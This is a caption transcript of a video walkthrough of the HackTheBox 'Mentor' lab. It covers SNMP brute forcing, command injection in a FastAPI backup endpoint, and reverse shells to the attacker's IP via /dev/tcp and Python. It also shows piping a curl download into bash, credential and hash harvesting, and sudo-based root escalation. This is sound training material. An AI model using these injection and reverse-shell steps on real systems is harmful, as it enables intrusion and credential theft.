HackTheBox - Mentor

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
what's going on YouTube this is ipsag we're doing Mentor from hack the box which is a relatively straightforward box as long as you value Recon and take things slowly and have a good workflow and I say that because there's a step early on in the box that if you Skip it's gonna just spin your wheels consistently because you have to enumerate SNMP as running on the box and then Brute Force the community string and there's a trick to brute force in the communities during a lot of the tools for some reason just fail I don't know why but like Hydra and 161 won't find the internal Community string you have to use a tool called SNMP brute at least that's the tool I use to find it um and if you don't do that you'll find an API web page that's coded in fast API but you can't do much without finding the SNMP info first and then once you get a shell on the box the next step is finding a password that's coded in the SNMP config file I think it's part of like snmpv3 but if you just run a lot of tools like lint piece for some reason it doesn't detect that so at the end of the video we'll go over lint piece and add it and so we detect it in the future with that being said let's just jump in as always we start off with and map so SC for default scripts SV enumerate versions oh a output all formats put in the end map directory and call it Mentor then the IP address of 10 10 11 193. this can take some time to run so I've already ran it looking at the results we have just two ports open the first one being SSH on Port 22 and its Banner tells us it's an Ubuntu Server we also have HTTP on Port 80. its Banner tells us its Apache hdpd version 2452 and also that it is Ubuntu it's also redirecting us to mentorquotes.htb so if we went to the website 10 10 11 193 we get a 404 page because we don't have that in our host file so let's add it there so sudo VI etsyhost and then 10 10 11 193 Mentor quotes Dot hdb so now when we refresh the page we get to a page that just has a bunch of quotes So the very first thing I want to do is look at the header we could use Curl but burp Suite is a bit quicker let's make sure intercept is on then send it go over to well I meant to go to the repeater tab and we can look at it and we see it's work Zug and python so we know this is going to be a python application it's probably going to be flask we could verify it by just getting like a 404 page so if we go to like does not exist we see this error message if you Google error messages generally they tell you something even if it looks generic and we see Bunches of flask so we know this is going to be a flask web server there's no point in like doing um the extension PHP when we look for things so I'm going to set up a go Buster to enumerate this or gobuster dir Dash U HTTP mentorquotes.hdb word list up seclist Discovery web content raft small words dot text I guess we should store an alfal so root dot out and as that runs we can also do some virtual host enumeration because it has directed us to a DNS name so I'm going to do buff we could also use Go Buster I've been a bigger fan of buff lately for using um this type of enumeration so mentorquotes.htb add the host header so Dash Capital H host and then fuzz Dot mentorquotes.htb and the word list opt seclist uh let's do Discovery DNS and we'll do SUB domains top million twenty thousand sure so I'm gonna hide everything with 18 words so we do Dash fw18 and then the other thing we really need to do I wish it was default on F is a dash MCR to match all error codes so I'm gonna do Dash MC all and right off the bat we get a 404 error code on API so I'm going to add that to my host file so sudo VI Etsy host and then we can add API dot mentor quotes.htb save it and take a look at it so API Dot and we get this one page um I'm gonna guess this is fast API right off the bat just based upon it returning the Json like that um if we put that in our host header we can see the server is uh UV icon I don't know how to pronounce that but it is just returning Json a very common thing with uh fast API actually let's just Google this thing um I'm gonna go to Google 10 rep Suite off if I Google this response what happens uh Django we have one fast API post but um this is definitely fast API and fast API does have a slash docs right so I just know that from playing with the framework and going to slash docs gives us this wagger page glancing added it doesn't look like any of these endpoints require authentication because we don't see the lock next to their name however when we click on it we do see the authorizations required clicking execute we can put something here and then going in it says it requires the header authorization so authentication is required fast API just isn't configured um with authentication in mind it is one of my big pet peeves because I really like seeing the locks next to each endpoint because number one the lack of authentication on some API endpoints is a common finding so making it visual lessens that chance also um you know authentication is being done uniformly across all of your endpoints when you have a visual representation so we'd have to click on each one of these and make sure and test just because it's not coded the right way um we'll look at it at the end of the video to see exactly how to do that but all these endpoints require authentication except the sign up so let's try out this endpoint we can sign up with our email we can do like root ipsec dot rocks and then a username of will do ipsec and then a password of will do password right and then we click execute and we can see user ID 4 is created so now when I go over to the login endpoint we can do try it out log in with the same email username of ipsec password of password and then click execute we can see it gives us a JWT back I'm saying JWT because I see three base64 strings if we look at this one Echo dash n base64-d the JWT is username ipsec email root ipsec.rocks so username and emails in this I'm going to copy this real quick and then we can go to the user's endpoint now that we have a user account paste this in Click execute and it wants the header again so maybe I need to do authorization like this click execute it's not working let's send it over to burp Suite to see exactly how this is looking so I'm going to click execute and we see um the actual page isn't adding it at all and um I'm pretty sure if we did the proper way then there would be a way to add this authorization header to everything I want to say we need to add Bearer um maybe not does that work no so sometimes with jwts you add Bears sometimes not so here we can see only admins can access this resource I'm going to do slash one to see if we can even get like user information we're a user id4 we still can't get it and I know I think rainy day had like 4.0 to put a float here and did something and if we do that here only admins can access the resource so can't really get any details out of this uh we could look at the quotes endpoint so now that we have this we can just edit a request I'm going to put this to be users this can be quotes if we get quotes it returns all the quotes that we saw on the first page if we do one we get this one if we do a float we get the value is not a valid integer so this is a pedantic thing most likely just because fast API generally use um pedantic for handling inputs and outputs and all that does is like a strict typing thing so you can't um give it unexpected input or it doesn't give you unexpected output it's a really nice thing that we'll probably dig into in a little bit so let's look at what else is the quotes if we do a post we can create a quote so let's do post and just hit the quotes endpoint only admins can access it uh let's see we could do a put probably going to say only admins right method not allowed so we need to do put on quotes one only admins and delete I'm guessing only admins as well right yes so I don't know exactly what we could do we could like I was gonna say we could try like SQL injection here right but again the pedantic is going to stop us from sending anything but an integer to this field so nothing we can really do so we have to go back and think of what Recon maybe this API isn't showing us all the endpoints so one thing we could do is a fuss so I'm going to um copy this to a request so copy to file I'm going to make this API dot request save it and we'll vapi.request and I'm going to do a fuzz here and we can do fluff uh Dash request API Dash request Proto HTTP word list opt seclist discovery um web content is there API here let's see uh let's just save this and then find grab this grep Dash I API so web content API and lowercase okay common paths sure Dash MC all and let's see status 404 let's Dash filter words too and we don't get anything here let's see instead of common paths what else is there we can do actions lowercase and we see there is a slash admin and the main reason I used buff here instead of Go Buster is just because I could paste in the Raw request and don't have to worry about the authorization header um I know I could have done it with the flag and go Buster but I like passing the request like you saw me just do so if I get slash admin we can see exactly what this looks like only admin users can access this so we have to figure out how to get to an admin and if I went back to this we see James mentioned twice we have an email for James but we don't have his password we could try logging in and just guessing it right so if we try it out and do James at Mentor quotes dot hdb I think it was and then James we could try logging in uh we probably should disable burp Suite and we get not authorized so we could do like or one equals one and try SQL injection here but it's probably super unlikely and we don't get it as well um so at this point I'd run out of things to think of and maybe there's another service I'm just missing right so do sudo nmap Dash p dash dash V to show open ports as we find them Dash o a and map all ports 10 10 11 193. and then we can also let's see let's clean this pane up so the bottom one is that end map we could do a second end map so sudo nmap Su to do UDP Dash o a and map we'll call this UDP 10 10 11 193 and again Dash V to see open ports as it finds them so we can see how long nmap sometimes can take and this is why I always say have Recon running in the background because you can't hack time uh this one took around three minutes and 25 seconds and we still have this end map going on and we haven't found the port that we need on this UDP scan so it's always something you should do at a habit just in the background um we're gonna keep it running hopefully it finds it and did not miss it because we had an nmap running while we did this port scan okay so it's been almost 20 whole minutes and nmap has finished for the UDP and what's more frustrating is the port I was expecting to see SNMP is not on this list and when it was running I always thought about canceling and restarting it because I had an idea what went on when I saw all these error messages above but I decided to let it play through just so we can use this as a learning experience because um if you're doing too many things at once especially with UDP scans you'll get mixed results and things like that so I'm just going to run it now that I don't have a second nmap running and we're gonna see if it finds the um SNMP port and how long this takes so we see it's still doing a few errors and that's just because of the VPN and maybe it's going to do all the same ones I did not actually expect to see that so it went four five six seven eight so we still have that send delay going on so let's see if it ends up finding SNMP this second time still it's probably going to take about 20 minutes to run but hopefully um it finds SNMP this time so I'm just going to let run pause the video again and we'll see what happens and we finally have UDP 161 reported open I'm going to let nmap finish just to see how long it takes see if it's still like 20 minutes and then we're going to run nmap one more time just to make sure it discovers 161 two times in a row when we're not doing anything in the background so here we have the output of the second end map we see it's 1008 seconds I think the other one was like 1100 looking at it yeah we see 1100 here but we do have 161 open I'm going to run it one last time and we're going to see how long it takes and if 161 is open I'm assuming it will be but honestly I don't know and this probably would go faster if I was connected to a US VPN server because I am in the US but I'm currently connected on a European one so the latency is a bit higher so my UDP and map will go slower um so let's just hope 161 does show up okay so I'm not exactly sure what happened here but our nmap shows a lot of UDP filtered ports that being said there is just one open and that is going to be SNMP so after doing the video and talking to oxdf uh he reminded me of one super handy flag when doing nmap and that is the Min rate flag so I'm going to set the Min rate to 10 000 and then just do 10 10 11 193 and we can see UDP um reliably discovers 161 even at this High rate and it only takes one second to run so this definitely does come pretty handy if you want to detect SNMP on future boxes when doing the Min rate this High just be careful because like all these close ports um it's not reliable going to be the same one and I think that's just because you're flooding the packet um if you look at it on a network capture you'll see that even though you send like a udb request to 2148 the server will respond within um icmp back saying the destination is not reachable if that Port isn't open sometimes and I think when you do this many packets at once it can't send all those requests back to you and you miss some so um yeah so hopefully you enjoy the Min rate piece let's get back to doing the Box so the path through this box is most likely SNMP so let's do a SNMP walk against it so SNMP walk Dash v2c which is the default version that you normally use and see public that's the default Community string and then 10 10 11 I think it was 193 yep and we start getting things I saw a um admin at mentorquotes.htb uh this I think is a default thing but there isn't any good information in SNMP however there is a possibility there's a second Community string configured so I'm going to go and download SNMP brute which is just a good uh brute forcing script for this uh let's see python GitHub there we go and then let's just clone this to our box so git clone copy it and then we can do python3 SNMP brute dot pi to see the options there are and there's quite a bit um let's see we want Dash T the IP and dash F the dictionary so I'm going to do a find on seclist to find a good word list first I'm just going to grab Dash I SNMP and we have this one so I think any of these would work um Let's see zerg's wc-l we can see how big each of these files are 118 lines that's a good one for a first um bet so let's do python and then it was Dash T the IP so 10 10 11 193 and then I think just the community string or the dictionary with Dash f for a file I guess we run this and we see there is version one public version two public and version two internal so we do have a um internal one and I you could do Dash B for brute so it doesn't ask you for enumeration generally I don't like using these snmb tools to do enumeration I just use SNMP walk before moving on I just wanted to show some other SNMP tools and show it just didn't work so um if you use these tools and your current um setup I would definitely switch out for SNMP Brew right so we do 161 which I think is the tool I used a long time ago in the last box that required SNMP uh let's see what is dash H so we need Dash I for the IP 10 10 11 193. oh it wants it to be a file so we can trick this with this little bass trick so now it runs this command and treats it as a file when you do it with this less than a parenthesis but we do see it comes back twice with public it doesn't pick up the internal which is odd um if we grep internal on the word list we see it's there if we grab public on the word list uh we have all public I don't know let me try one thing real quick pseudo VI all public I'm going to delete that from it we're going to run it again so it looks like it's just treating the all public as published for some reason it doesn't pick up on internal which I just can't understand why um so 161 failed we also have Hydra so you can do like Hydra Dash p opt seclist Discovery SNMP comment strings dot text and then Dash V the IP and then s and MP and it will quickly resolve public but it never will discover internal I think it takes about like 10 minutes to run for some reason um Hydra is slow in this sense so I'm just going to pause the video we'll come back to it and show um it did not detect internal it it finished a bit quicker than I expected only taking I think one minute however Hydra only detected public so both Hydra and 161 fail to detect the internal Community string for this box um so definitely use SNMP Brew but with that being said let's get back to the Box so if I do go back up here we do SNMP walk and put internal here it's going to dump a lot of information now this this one can take a while I'm gonna do time against this and then we're gonna do a SNMP bulk walk as well and we're going to see the difference on the two so let's do um if I just paste this I think bulk walk has the same arguments it does sweet so let's do time against that and we'll call this bulk dot out and I'll use T so I can see the output as it comes let's copy here we go t bulkwalk dot out and then we can just do a time here um it's going to give me the same exact information I just want to see um the time so I'm going to pause the video let both of these finish and we're going to see how long they take so the regular SNMP walk took about 13 minutes and SNMP bulk walk took around one minute so it's definitely faster to use bulk walk when dumping the entire um MIB and we see a lot more information than we had saw when we just looked at um the public Community string right this is showing like all installed software right now we have a list of packages here there's also going to be the actual programs and arguments that is running so let's just take a look at this type of area so I'm going to do a less against the file and then search for um HR software run path and we can see everything here I want to say the 362 these are pids I may be wrong there but we do see it jumping so I know it's not incremental um almost positive it is a PID and this isn't showing the um arguments but there is another one that will show Arguments for instance we see just this one python thing running here there's a python thing running here as well if we looked at two one two three let's grab that real quick so I'm going to grab two one I actually have to go in SNMP Brute well no we're here bulk walked out okay so grab what'd I say 2123 right here yep two one two three on blockwalk dot out and we can see everything related to this so I'm guessing this is just telling us the PID here is uh the pipe like the program the python is running we have the path to python um this is probably going to be the CMD line if you looked in like slash proc and we see login.pi and some credential and then nothing else right so this is probably going to be a password to something just because it's being passed to login.pi and this is one of those reasons why any type of hardening thing will tell you never to put passwords as arguments just because it gets leaked when you do um processes so like PS Dash EF and things like that so let's grab on 2050. let's just see something else and then we'll move on right so 2050 we can see this one is python this is doing some multiplexing semaphore track I want to say this is the fast API um let's see what did we just do um let's try 1916. I don't think I checked that I was trying to find the fast API server but it's going to be one of these here we go UV icon so this is most likely fast API we can also see the dash dash reload which means the um web server will automatically load new code if you manage to write to a file on it and so it behaves kind of like PHP in that aspect where if you write to a PHP file then call it again it gets executed if this reload wasn't in this then if we wrote to a python file it wouldn't take effect until python itself is restarted so this is just monitoring all file rights to the Python scripts within the directory and if they change it reloads the server right but we have this password to um login.pi and if we go back to Mentor we did have an email username so I'm going to put that password and for this and then when I click execute we get a session ID and before we're getting like invalid user or something so now we have a way to um access admin endpoints right so if I went to users and we run this again uh let's see path ID oh not a valid integer so we put this user not found we can dump a list of users if we do it with no arguments we get one two it's odd that let's see 34 so user not found I wonder what my user ID is unless my user got deleted that I created in the box so we'll have to look at the code there to see exactly what this endpoint is doing that I don't see the user I created but we have two usernames James and SVC we could try logging into SVC but um it's not going to work I just knew that from the power of hindsight so let us check that admin endpoint remember there's there's this endpoint art slash admin that only admin can access and if we try to we can see there's a slash check and slash backup now so if I enter slash check we get not implemented yet so let's do slash backup and we get method not allowed so if we do a let's try options uh not allowed let's try post there we go so now we have an error on possible entity it requires a body so since this is fast API I'm just going to put Json and I don't know any Fields so I'm just opening closed curly bracket so we put something in the body and it tells us now path is required so if I do path and then Etsy pass WD and then I guess end it with a comma let's see I screwed something up here okay so it doesn't want to be ended with a comma for some reason I guess that's uh just how it expects Json I bet if we had multiple variables then you'd put commas in but the last one does not and we just get info done when we run this so we can try something with it doesn't exist we still get done um we could try hitting check and we get meth and not allowed let's change it to a get not implemented yet so we don't know exactly what this backup is doing we could test for it like command ejection so we could try Etsy pass WD and then sleep one and see if this request takes one second it does not we can also try a ping so I'm going to test pin against myself because I always get these flags on if it's Dash C or dash n it is Dash C1 so let's do a pseudo TCP dump Dash I ton zero icmp dash n to disable DNS and I'm probably going to add a dash v as well and then try ping Dash C1 10 10 14 8. and I'm going to end it with a semicolon as well just in case um it adds something to the path it takes 200 milliseconds and we get a ping I'm going to try sleep one again real quick because the time does go up when we use ping like this and maybe it was this semicolon that I screwed up with and that was it so what's happening here is it must be putting something after the path and when we don't have the semicolon it creates invalid syntax so it just automatically ends it so since this is a backup feature maybe it's doing tar and it's doing like tar um let's go over here maybe it's doing tur Dash cjvf backup.tar.bz2 and then taking user input here and backing up another file uh let's add this it's adding something at the end after user input I don't know what it is but when I just put sleep2 here like this it appended Etsy pass WD after this which caused my script to error because this is an invalid command when I ended the Sleep 2 with a semicolon then it executes just this and that's why it worked right so now we have some type of blind execution we can try like um a reverse shell now so I can do bash Dash I Dev TCP 10 10 14 8 9001 zero and one like that and again make sure we have that semicolon at the end URL encode it for good measure nclvnp 9001 send it and we just get done we can try putting bash.c before this just in case this is not being executed in Bash and then we run it again still don't have a shell so I'm going to guess we may be in some type of Docker or bash just doesn't have for some reason like the network thing like we did with the dev TCP so I'm gonna get a python reverse shell because we know this box has python because it is fast API so I'm just going to do rev shells.net I think it is or let's see Google rev shells let's see if this comes up real quick Rev shells.com and I'm going to search for python let's just do python1 put our IP and then copy and paste this so paste this and we can say python oh it's already doing python here so when we send this we get some type of errors and that's because of quotes so we have to escape every single quote um does this have anything we could try URL encode let's see what happens with this I'm actually not sure I know escaping the quotes will work but maybe URL encoding does as well does not or I screwed something up so let's just escape the quotes so get rid of that get rid of that let's see what else is there a quote where our host and our Port is okay oh sh as well so now we have escaped all the double quotes So this should be Val and Json and then we run it and we don't get a response here which is a good sign because we have a shell so python3-c import PTY pty.spawn then sh and I'm doing bin sh because I'm not positive bash exists yet so that's done sdty raw minus Echo FG enter twice and now we have a good shell here so we could look for like bash to see if it exists and it doesn't look like it does so that's why a previous reverse shell did not work but the very first thing I always do when I get a shell somewhere is try to get credentials out of the web app and if we look at this uh Docker file we don't see any credentials exposed um oddly enough it is exporting home svc.local bin to path so I'm guessing that's where the um app exists so let's see there is a config.pi if we look at it we don't get anything there is DB dot pi and we have it running postgres and it's going postgres against 172 2201 which I'm going to guess is probably the host let's see ipaddr see I'm in 2203 so postgres is probably going to be um on the host system let's see what else is there do we see postgres credentials that's database user metadata email password database let's see crap Dash RI password does this not have recursive grip on it it does not look like it does so I'm going to do a ls-la to see if there's like a DOT EnV file I do not see one um let's go back in DB dot pi oh the credentials um sometimes default credentials I guess just hide in plain sight so the credentials are postgres postgres to this box we could like you upload chisel to this box and for the port and access it and then get a shell that way um we'll do that probably at the end of the video the way I generally do this if I'm like in a rush or I can't get a reverse shell since we know the reload is on this box um where is it right here we can just edit the file so this is a fast API and if we go into the API directory we can see all the files so if I look at users this is going to be the user endpoint so if we just get user ID we can see it's doing a response model and this is going to be the pedantic piece and if we look at this it's doing users equal to a weight this is going to be some async IO thing so we can run multiple tasks at the same time it doesn't really matter here and it's doing a crud dot get user and cut is just a terminology mainly used for database um like create I forget what it stands for um create R is something update delete so or it's probably some way to Pi create replace update delete is what crud I would guess but if we look at crud.pi the main thing I'm showing here is we don't have anything filtering the password out right and if we look here for a git User it's just doing a users.select and returning a fetch all off the database so there's nothing here that's also filtering the user so what is filtering the user when we get an ID is the response model it's user DB so if we look at the models and this is going to be the pedantic code we don't have them so we can do VI we can see the base model is just ID email username the database is probably returning everything but pedantic is saying return this Json blob with only these variables we know the password is in the user schema so if we add password to the user DB model of pedantic uh we can do password here and I used yank uh like YY and then P for put and I did that because I don't know if this is tabs just bases it's always safer when you're editing code in Vim on a Target to copy and put lines down just so you get all the space incorrect because if I use tab here and it was using spaces the code would crash right so it's just a safety thing so I'm going to write this file and now if I go back to the users right and then we run this um it's not working did I crash the server or maybe this isn't multi-threaded so maybe the service hung while I have this reverse shell we don't see it working exit okay now we get it and we don't have there we go now we have the server reloaded so the server wasn't reloading until I exited this shell and then once I did it reloaded and we see the user model now has password in it so when we get a user we can get the hashes as well what's going on it's me from the future again and I wanted to highlight this whole thing of the web server hanging because it is somewhat a common issue when attacking servers that are in development that don't have something proper like nginx or Apache in front of it that do threading so let's just show this real quick and we run this command we get a shell and nothing responds to um us until this show dies and the whole reason that happens is if we look at ps-ef grep on let's just do app we can see this is the command that's running and it's just got two workers assigned to it I'm pretty sure if we up this to three workers then it would work in the background I think one worker is just the master and then anyone that we connect is another one so when you hang the one thread there's really no more threads left to accept it users and that's why um we're in this state right so if I just have this path to be just Etsy past WD again it's not coming back to us um the web server opens the connection because we're part of that Master worker but when it tries to Fork us over into the other thread it just can't because it doesn't have the workers available so we could fix that but before I do I want to show if you didn't get a proper PTY and Ctrl C out of this session uh it still hangs on the server and it becomes a royal pain right and many people had to revert the box when this type of thing happened thankfully I'm from the future and have a root shell here so we can just do PS Dash EF prep on python see this shell is still running here it's probably this Command right here so I can just do a kill-9 on this and now this comes back to us so the easiest way is just to run a command called No Hub um I'm guessing it's on the container but we can just do no hub and then leave this command and we put an ampersand at the end so if I do ncovnp run it and we did not get a shell so the best way to troubleshoot this is let's just run it locally right so I'm going to take this python shell actually first I'm going to run it on my machine uh unexpected oh because we have all the escapes right let's see we probably want to export this as well so I'm going to get rid of the no hop this is how we have it so I'm going to run this we had a semicolon at the end and we'll have to get rid of the escapes because we're doing that because it was in Json um since we're just running it natively again get rid of those and then one more on sh so we have the shell and we can see my terminal down here does hang so we can exit that and we want to play with no Hub right so if I do no hop python like this I don't have the Ampersand at the end so it's not going to background so that works now let's put the Ampersand here and we get a invalid command because there's the semicolon at the end and remember we have the semicolon here because the actual servers are pending data and we use the semicolon to ignore everything afterwards right um looks like we can't use the amp or the Ampersand and a semicolon that being said um comments will also ignore everything out when we do SQL injection we do the dash dash space that's a comment because we want to ignore what the server adds to it and Bash it's that little um hashtag right and that works so now let us move over to the server and we're going to put a new hook back in and then go to the very end get rid of the semicolon and I'm going to put that Ampersand n and because this is an HTML or whatever special character I'm going to press Ctrl U to URL encode it and if we just send this we get info done so the server responded to us and we have our shell so I can go to this Pane and the server is still working and we have our shell it's happily backgrounded so um now we don't cause an outage when we're playing with this right so we can do PTY or python C import vty PTY spawn bin sh stty raw minus Echo FG and then I'm going to just do a ps-e-f Orest let's see I guess we can do it on this host I just want to see what my reverse shell looks like um I don't even know if I see the no hop that's me right let's see no hop I don't think nohup is even showing up in PS which is pretty cool um but all the no Hub command does is I bet if we demand no hope it'll explain it better than I could uh run a command immune to hang ups with output to a non-tty so I think it's just habit I always run no Hub when I do these things you could probably just do the um Ampersand at the end but I think if you do that and something kills the thread it won't background itself and um it'll die as well I just know no Hub makes things much more stable for me so hopefully you enjoyed this little snippet so I'm gonna go back and edit in a few other things I want to add in this video um we've probably already know James's password because that's the user we logged in as so we have this one credential we want to get this one hash um we can just go to like crackstation and put this in and if it doesn't crack right away then we can go to something like um hashcad and crack it but crackstation is generally my first bet when it's just a hash and not like a b Crypt um it is someone annoying because you do get these captures but then once we crack we can see the password is one two three something I have no clue what that is but we now have the password to SVC so I can do SSH SVC at 10 10 11 193. put in the password and I get logged into the box as the service account and when I was doing the box for the first time I spent a lot of time trying to prevask because this one is not obvious it's in a file but Lin P's itself won't tell you uh the string and at the end of the video we'll probably modify a Lin piece to add it so I never waste that much time on this step again but I kind of want to take all the steps I looked at before running Lin P's to see what is going on I start off with running a ps-ef and I can probably search for root so root stands out a bit more but this is just like looking for various things that are exploitable right and the main thing I see first is well this is us right we sshed into the box we have Apache here we have three different Dockers running which I didn't know we experienced the one here is the login script that we saw before and right now I see postgres um I thought postgres was running on the host because it was 172 2201 but it looks like there's some routing to put postgres into a database so the very first thing I would have tried if I did not run this PS command is going back on the container trying to Chisel my way into postgres and um get a shell that way because postgres does allow you to run commands but I'm just going to be put into a different Docker container so it's not nearly as interesting to me now that I see that right we also have the fast API server running in a container as well and I'm guessing maybe async didn't clean things up because we see a lot of defunct processes I bet if I ran another sleep uh we'd see another one go defunct so there's definitely a bug in the web server not cleaning itself up and it is also running um and a container I think I said that we have this one this is just executing main.pi maybe this is just the initial web page that we accessed we haven't got access to this so maybe we want to look into this one and get a password from that container but um it's not really that interesting to me we could try to find what main.pi is by just doing a fine slash Dash name and we can hide all errors and we can see maybe this is it let's see python3 let's see what this is I don't think this is it um Maybe maybe after we root the Box we can go in that container and see what it is let's see home SVC dot local if we go back to the page Mentor quotes let's see if we can find the file real quick um your daily motivation that's probably a unique string so grep Dash R your daily motivation on this and I don't see anything here we could change it up by doing like slash VAR and we probably want to add Dev null to standard error don't see anything on that maybe home and let's see maybe user will be the last one we check but I want to say if it was in a Docker and we had read access to it it would be in VAR but I don't see it there I'm guessing we don't have access to where the web server is hosted also if this was like verw HTML uh we'd find it just because of it existing right I'm going to cancel that crap because it looks like it's going to take a long time and we could just also I guess curl 172 2001 on Port 8000 we get detail not found if we do localhost on Port 80 it gets moved to Mentor quotes and I'm guessing that's very dub dub dub right HTML see this is not it right no that's the Apache 2 default page so maybe in the Apache config we want to look so sites Dash enabled let's look at the default and we have Mentor quotes and it's going to 172.2201 Port 81. so we know that um this website is in a Docker container and I don't think we have read access to it so we can't really just get credentials out of that or see what it's talking to it's probably talking to the postgres server so at this point I'd probably start looking at forensics so I see this user was probably created around June 7th the next step is to look at when the box was created and I always like seeing the SSH key of the SSH service because this rarely gets regenerated so it's a good idea of when it was created so June 3rd you can't really just take random packages because we see SSH config this was February 25th it's actually before this and the reason why is um it was created as part of the APT package a d package and it kept that file time stamp SSH keys are generated upon like install so that's why that date is different if we run a stat against these so let's do stat on Etsy SSH sh config and we'll do the host key as well so host let's just do DSA key we can see um everything is June 3rd and for SSH config we see this is February 27th February 25th June 3rd and the birth is June 3rd so LS isn't showing the birthday this is when the file was created change is when like a metadata permissions was modified modify is when the file was actually modified and access is supposed to be the last time the file was accessed but I don't know if that like actually works well right because if we do a cat against this and then we do a stat against the same file the access date doesn't update but the ls command what was it showing we do lsla at cssh it is showing February 25th so the date it was last modified and again this comes out of the D package also if you look like at ipsec.rocks for time stamps and stuff you'll notice I talk a lot about this which is the in-depth time stamp like the milliseconds it was created and since it's all zero that's another indicator it was not user created if we look at it on this so we do find or not find stat this we can see all these timestamps are um granular so long way of saying we should look at timestamps um I'm going to look at June 4th to like June 14th because uh June 3rd is when the box was created so June 4th is probably when customizations would happen and June 14th is like a week after right so we'll do a find on let's just look at Etsy to see system services that have changed and then I can do a type f for all files and then newer Mt for newer modified time and we'll do year 2022 June which would be 06.04 and then we also want to say a not so exclamation point newer MD 2022 06 14. I'm going to go back to the beginning of this and do a dash LS so we can see permissions and all that type of stuff and then two devno and let's just do last capital S to put it all on one line and this is showing every file so maybe I want to do the ls at the end I always get these flags kind of mixed up there we go that looks better um so when I put LS up here it was printing out all the files and then doing this which is meaningless so I wanted to put the print part on the very tail end um find arguments are very particular I guess I should say so we see Etsy studio is modified that's something we haven't tested is if we can run sudo on this box I think we also have the SNMP and that's really about it so I'm going to look at the SNMP so if we do a less on Etsy SNMP snmpd.com it is a relatively big file a lot of the default things begin with a comment so what I'm going to do is a grep dash V to exclude and then say everything that begins with a comment exclude it and then I'm gonna do a grep period to grep every line that begins with a character and we can see the SNMP config and one odd thing we see is this create user bootstrap and it has secure password one two three underscore underscore if we look at Etsy pass WD and then let's grab for everything that ends in sh we can see we are the service user we have root and there is James if we ask you to James and put that password in we can log in and then we look at sudo and James can run uh Ben sh as root so we can just do sudo bin sh and now we are root so let's take a step back because Lin P's really should be able to find this I'm guessing let's see I'm not like an expert on SNMP or anything I didn't do that much research into this but I know snmpv3 has its concept of users so I'm guessing this is the start of an snmpv3 config and they just don't fully configure it um we can see where is internal um crap end come to SEC so this is uh let's come to say default internal so this is why we can see the processes on v2c as the internal Community string because of this line but I think V3 the create user is part of that I may be wrong there but we do have a credential right so let's run Lin piece just to confirm this credential doesn't exist and I waited till the end of the video to do this because I want to be able to search this string a super secure password right so I'm going to go Dev shm let's download the very latest blend piece so Len P's GitHub go here go to releases and download so we can download limpeas.sh we should download on our box wget python a web server and we can curl 10 10 14 8 or 8 000 lynnps.sh and we'll pipe the output into lynnps.l um we need to bash and then we can fight there we go so I'm going to let this run and we're going to come back and see if Lynn piece tells us about this password and when it doesn't tell us about the password we're going to modify the limp source code rebuild it and have a copy that will flag this in the future so any machine that we run lint piece on that has SNMP it'll be detected so okay so Lin peas is now done let's get the password that we wanted the super secure password and then if we grep this on um let's see lnps.l it doesn't get found uh we could less super uh blend peas let's see maybe Vim will be better I guess we'll just um I wonder if Cat shows it okay that's better so we can just do SNMP to back search and we can see it actually does have a thing to analyze SNMP specifically and doesn't catch the create user at all right so this is the thing that we want to update so if we go into um opt where we have committed this so this is where Lin piece is installed I'm going to do a get pull to make sure I am up to date and then I'm going to do code dot to open this up in vs code and we can take a look at kind of how it runs so lint bees is when you um commit on it it's a bit weird because it uses this python Builder to copy a bunch of files into one right so what I want to do is find where SNMP is so if we control F or edit find in files we can search SNMP and we see it's in software information it's running PS s and MP win pe's file analysis file info these are net when it ends in dot CS so I'm going to ignore that um we do have sensitive files so if I look at sensitive files we see the name SNMP auto check I think this is just going to be if it's a quick check or not and the way the file snmp.com and bad regex I'm guessing is going to be um bad is objective right when I first think of bad ragx these are like things I don't want to match against but this is what I do want to match against and it's bad well it's not bad to have them in the config um the bad ragx is what's going to be shown so we have our own Community our W Community if we go back to our box we see Ro Community here right so that's probably why these are getting shown so we want to add a create user right and I only care about users um when it starts with create user probably if we go with this yeah so I'm going to put one for create user like this and then we're going to save it and then we have to build uh Lin peas so let's go into Len P's and then go to Builder I can probably python3 Lin P's builder.pi and it errored let's see does Lynn peas and please does he have any instructions for building contributing check out to do so these are things that he once added into Lin piece that's not how to contribute it's Auto built Auto Builder from limpy's Builder huh so I'm going to go in the parent director real quick I'm going to grab this for lin P's Builder we do have this pie cash one of it's not pi there we go so we have a get flow GitHub workflow and that's probably how this is being built so if I left this file Builder so it makes your pie yaml is installed goes into lint piece and then runs this module okay so that should be simple enough so I'm going to go into Lin peas run the exact module that it said and here it is going to start building a new copy of limpies so with this copy hopefully it has the create user check and then when we run it against it we'll see if um the SNMP config shows us um what we want right there we go it is now done if I do it LS I'm guessing it's lynnps.sh so I'm going to grab create user on winpies.sh and we have the regex we have created so let us python3 Dash M HTTP server to host this we probably should delete this web server start this one up and then we can run this again and this time hopefully when we grep it for the super secure password it will show us the line that we want okay Lynn peas has finished so let's run the same grep we did before on limpies.l and we can see it has now found the password so we are now free to create a pull request on Len peas and add or check in so we will always see these create user things so with that being said that's going to be the Box hope you guys enjoyed it take care and I will see you all actually not the end of the video there are two more things I wanted to show that I couldn't find a good place to sneak them into the video the first piece is just simple using chisel to afford postgres to our server so we don't have to modify the web server code in order to get the password because that is a dangerous thing to do if you script the code the web server goes down you lose your shell and you also lose your access so doing chisel just a forward postgres is going to be the easier thing and then after that we're going to fix up the fast API do some development so yeah hope you enjoy the additions so let's say we can run chisel on this box which we could have in the first place so let's get it on there so let's do python three um hdb server um before I download it I'm going to cat db.pi I'm going to copy the postgres URL and we're going to just save it on this pane right so let's go Dev shm W get 10 10 14 8 Port 8000 and I will download chisel like that and it's going to take a minute to download and on this pane we can start up a chisel server so I'm going to dot slash chisel server word dash dash reverse and by default I want to say it listens on Port um 8080 so I'm going to change it to 8001. so in this pane we can connect a client to it and postgres um I forget what port it runs default I want to say like five four three two one so let's do psql Dash H or dash dash help 5432 is the default Port of postgres so let's do chisel and then client and we can connect to 10 10 14 8 Port 8001 and we're going to do a um reverse on Port 5432 one twenty seven zero zero one five four three two uh permission denied let's move chisel to Temp because I guess we can't execute out of Dev shm run this and I don't see it connecting back to me so I must have the syntax wrong let's see do we have NC on this box we do NC 10 10 14 8 8001 let's do a dash zv we can see the port is open and that command does look right to me so I'm going to kill the server and add a dash V so I have reverse run it again and we see some type of thing oh the server cannot listen on 5432 because either something's listening here or it just does information so let's do sslntp crap 543 and we can see postgres is running on my local computer so I'm just going to a sudo service postgrass ql stop I'm guessing like Metasploit or something had started it up so now I'm going to run this we can run it 